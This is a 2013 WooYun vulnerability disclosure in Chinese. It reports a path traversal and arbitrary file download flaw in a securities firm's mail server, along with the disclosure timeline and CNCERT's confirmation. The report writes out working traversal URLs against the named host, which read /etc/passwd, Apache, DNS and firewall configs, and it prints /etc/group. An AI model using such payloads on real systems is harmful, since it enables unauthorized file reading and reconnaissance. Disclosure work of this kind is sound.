当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037893

漏洞标题:西南证券某邮件服务器系统文件遍历与任意下载

相关厂商:西南证券

漏洞作者: 霍大然

提交时间:2013-09-23 17:48

修复时间:2013-11-07 17:49

公开时间:2013-11-07 17:49

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-23: 细节已通知厂商并且等待厂商处理中
2013-09-28: 厂商已经确认,细节仅向厂商公开
2013-10-08: 细节向核心白帽子及相关领域专家公开
2013-10-18: 细节向普通白帽子公开
2013-10-28: 细节向实习白帽子公开
2013-11-07: 细节向公众公开

简要描述:

西南证券某邮件服务器系统文件遍历与任意下载

详细说明:

http://mail.swsc.com.cn/

8.PNG


一、apache配置文件下载:
http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/httpd/conf/httpd.conf

8-1.PNG


二、dns配置
http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/resolv.conf

8-2.PNG


三、看看里面的用户:
http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/passwd

8-3.PNG


四、看看是什么版本的linux:
http://mail.swsc.com.cn/?tn=../../../../../../../../../../proc/version

8-4.PNG


五、防火墙的配置
http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/sysconfig/iptables-config

8-5.PNG


六、看看网卡是怎么配置的
http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0

8-6.PNG


可看到还是内网地址,第二块网卡就没配了:

8-7.PNG


今天wooyun好慢啊,不再分析了

漏洞证明:

用户组:
http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/group
root:x:0:root bin:x:1:root,bin,daemon daemon:x:2:root,bin,daemon sys:x:3:root,bin,adm adm:x:4:root,adm,daemon tty:x:5: disk:x:6:root lp:x:7:daemon,lp mem:x:8: kmem:x:9: wheel:x:10:root mail:x:12:mail news:x:13:news uucp:x:14:uucp man:x:15: games:x:20: gopher:x:30: dip:x:40: ftp:x:50: lock:x:54: nobody:x:99: users:x:100: utmp:x:22: utempter:x:35: nscd:x:28: floppy:x:19: vcsa:x:69: ntp:x:38: pcap:x:77: slocate:x:21: dbus:x:81: audio:x:63:gdm avahi:x:70: rpc:x:32: mailnull:x:47: smmsp:x:51: apache:x:48: sshd:x:74: oprofile:x:16: screen:x:84: xfs:x:43: rpcuser:x:29: nfsnobody:x:65534: stapdev:x:101: stapusr:x:102: stap-server:x:155: haldaemon:x:68: avahi-autoipd:x:156: gdm:x:42: sabayon:x:86: eyou:x:19389: mysql:x:19390: sqx:x:19391:

修复方案:

对参数tn过滤

版权声明:转载请注明来源 霍大然@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-09-28 12:24

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给证监会信息化主管部门,由其后续协调网站管理单位处置.
rank 11

最新状态:

暂无


漏洞评价:

评论